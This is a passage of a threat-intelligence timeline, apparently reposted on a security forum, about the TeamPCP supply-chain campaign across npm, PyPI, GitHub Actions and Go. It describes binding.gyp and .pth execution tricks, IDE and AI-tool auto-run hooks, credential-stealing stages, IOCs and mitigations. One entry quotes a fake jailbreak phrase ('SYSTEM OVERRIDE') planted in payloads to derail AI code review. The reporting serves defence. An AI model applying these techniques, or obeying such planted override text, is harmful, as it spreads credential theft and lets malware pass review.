(.github/setup.js) plus two IDE execution mechanisms.

Tue, Jun 2

Jun 3

Second
wave: binding.gyp technique

Miasma pivots to novel execution
method. Malicious binding.gyp triggers code execution during npm
install via node-gyp shell expansion, bypassing traditional
preinstall/postinstall script detection. Multi-stage payload downloads Bun
runtime from GitHub, harvests credentials from dev workstations and CI/CD
environments. Exfil repo fingerprint: Miasma - The Spreading
Blight (hyphen instead of colon).

Wed, Jun 3

Jun 4

Third
wave: additional packages compromised

Attack expands to 3 additional npm
accounts: ethlete-user (9 @ethlete/*
packages), dominikdorfstetter (4 @forjacms/*
packages), mynameistito (github-archiver, discord-search,
create-cf-token). Same binding.gyp payload. 24+ additional malicious versions
published. Exfil repo fingerprint: Miasma - The Spreading
Blight (same as wave 2).

Sat, Jun 6

Jun 7

Fourth
wave: Hades (PyPI)

Miasma crosses to PyPI. 37
malicious wheels across 19 packages via maintainer account takeover. Uses
Python .pth startup execution—lines beginning
with import execute on any Python interpreter start, no package
import needed. Same Bun-powered credential stealer. High-impact targets
include dynamo-release, spateo-release, coolbox (bioinformatics
tools). Exfil repo fingerprint: Hades - The End for the Damned.

Sun, Jun 7

Jun 8

Miasma
source code published

Attacker published Miasma worm
source via 4 compromised GitHub accounts. Repos titled
"Miasma-Open-Source-Release" with description "Alright Lets See
If This Works". All since removed by GitHub.

03:09-03:10 UTC

Fifth
wave: Hades expands (bioinformatics)

6 PyPI bioinformatics
packages compromised in under 60 seconds
via felixEvora account: embiggen, ensmallen, pyphetools, gpsea, phenopacket-store-toolkit, ppkt2synergy. New
TTP: payload padded with fake LLM jailbreak prompts ("SYSTEM OVERRIDE
— CLASSIFIED BRIEFING") attempting to break AI-assisted code analysis.
Exfil repo fingerprint: Hades - The End for the Damned (same as wave
4).

Wed, Jun 24- 15:39 UTC

GitHub
Actions hijacked: codfish, mawesome

2 GitHub Actions
compromised via Pwn Request: codfish/semantic-release-action (23
tags) and simonecorsi/mawesome (6 tags). Payload searches GitHub
commits for RevokeAndItGoesKaboom messages as operator token
dead-drop channel.

20:00 UTC

Golang
ecosystem spread

2 Go
modules compromised: verana-labs/[email protected] and verana-labs/[email protected].
Downstream of codfish/semantic-release-action. Payload
in .claude/index.js — executes when devs open repo in IDE/AI tools,
not via Go build system.

23:04 UTC

LeoPlatform
npm packages compromised

20 npm packages published in 3-second burst via
compromised czirker account: leo-sdk, leo-logger, leo-aws,
etc. Same RevokeAndItGoesKaboom marker links to earlier GHA wave.

Thu, Jun 25- 09:15 UTC

Additional
npm packages via llxlr account

3 npm packages published via
compromised llxlr account: [email protected], [email protected], [email protected].
Same binding.gyp technique.

Fri, Jun 26-15:00 UTC

ImmobiliareLabs
npm packages compromised

22 malicious versions across 4
@immobiliarelabs packages published in 30-second window via OIDC/GHA.
Provenance dropped. Downstream
of codfish/semantic-release-action compromise.

Maintainer
Response

[Security]: Malicious npm releases found
in @immobiliarelabs scope #1052

https://github.com/immobiliare/backstage-plugin-gitlab/issues/1052

Thu, Jun 4- 02:36-03:22 UTC

Microsoft
repositories compromised

Compromised GitHub account used to
inject malicious code into 42 repositories and 236
branches across Azure, Azure-Samples, and Microsoft GitHub orgs in 46
minutes. Same 4.5 MB .github/setup.js payload with IDE auto-execution
hooks (Claude Code, Gemini CLI, Cursor, VS Code). As of 14:00 UTC, malicious
code contained to GitHub—not pushed to other distribution channels.

Thu, Jul 2

Jul 2

✓FBI IC3 Advisory PublishedFBI Internet Crime Complaint
Center publishes Cybersecurity Advisory 260702 (https://www.ic3.gov/CSA/2026/260702.pdf)
on TeamPCP supply chain campaign. Covers full attack chain from Trivy through
Hades/Miasma, documents TTPs aligned with MITRE ATT&CK G1056, and
recommends mitigations.

Post-Compromise
Analysis

Deep-dive research into TeamPCP's post-compromise
activity—what happens after credentials are stolen from supply chain attacks.

Wiz Research May 2026

Tracking
TeamPCP: Investigating Post-Compromise Attacks Seen in the Wild

Analysis of how TeamPCP operationalizes stolen credentials
from supply chain compromises (Trivy, KICS, LiteLLM, Telnyx) to compromise
cloud environments.

Attack
Stages


  1. Secret
    Validation
    — TruffleHog validates stolen AWS keys, Azure secrets,
    and SaaS tokens via live API calls

  2. Internal
    Discovery
    — Within 24 hours: IAM enumeration (users, roles,
    policies), compute (EC2, Lambda), storage (S3, RDS), and container
    infrastructure (ECS task definitions, cluster mapping)

  3. Code
    Execution
    — GitHub workflow abuse via stolen PATs; Nord Stream
    tool for malicious workflow creation; ECS Exec with SSM Agent for
    container access; workflow log deletion

  4. Data
    Exfiltration
    — Bulk repository cloning via git.clone; mass
    extraction from S3, Secrets Manager, and databases

Tools
& Infrastructure


  • TruffleHog —
    Credential validation

  • Nord
    Stream — GitHub automation

  • Boto3 —
    AWS API interactions

  • Mullvad
    VPN & InterServer hosting for obfuscation

Detection
Signals

Unusual enumeration (ListUsers,
DescribeInstances), unexpected secret access patterns, mass clone operations,
workflow log deletion, API calls from VPN providers.

Kudelski Security April 2026

Investigating
Two Variants of the Trivy Supply Chain Compromise

Technical deep-dive comparing the
GitHub Action vs. container binary variants of the Trivy compromise.

Variant
1: Trivy Action


  • Shell
    script + embedded Python in entrypoint.sh

  • Reads /proc/PID/environ for
    runner secrets

  • Scrapes
    GitHub Actions runner memory for JSON secrets

  • Filesystem
    harvester on self-hosted runners (SSH keys, cloud creds, K8s configs,
    wallet keys)

  • AES-256-CBC
    encryption with RSA wrapping

  • Fallback:
    creates public repos named tpcp-docs

  • No
    persistence—single execution

Variant
2: Trivy Binary


  • Malicious
    code compiled into Go binary (153MB ELF)

  • Two
    embedded base64-encoded Python payloads

  • Persistent
    backdoor via sysmon.py systemd service

  • Downloads
    second-stage from Internet Computer Protocol (ICP) blockchain C2

  • Targets
    developer machines (non-CI environments)

  • Persistence—50-minute
    polling cycle

Key
IOCs

C2 Domain scan.aquasecurtiy[.]org

Blockchain C2 tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io

Operational VPS nsa[.]cat

Attacker
IPs (from CloudTrail)


  • 209.159.147.239 —
    TruffleHog validation (NYC VPS)

  • 170.62.100.245 —
    Cloud enumeration, S3 scanning (Kali)

  • 154.47.29.12 —
    Org recon (Windows 11)

  • 103.75.11.59 —
    Credential re-validation (macOS ARM)

Mitigation
Recommendations


  • Use
    OIDC federation instead of static IAM keys (minutes-long expiration
    vs. indefinite)

  • Pin
    container images by digest hash rather than tags to prevent automatic
    redeployment

  • Disable
    automatic container updates in production (Watchtower auto-deployed
    the compromised aquasec/trivy:latest)

  • Apply
    least-privilege IAM policies scoped to specific resources and
    services

  • Enable
    CloudTrail S3 data events for object-level visibility

 ******End from this site*****

































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































Comments
new comment
Nobody has commented yet. Will you be the first?
 




This link is from a restricted area of the forums.
Forum



Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.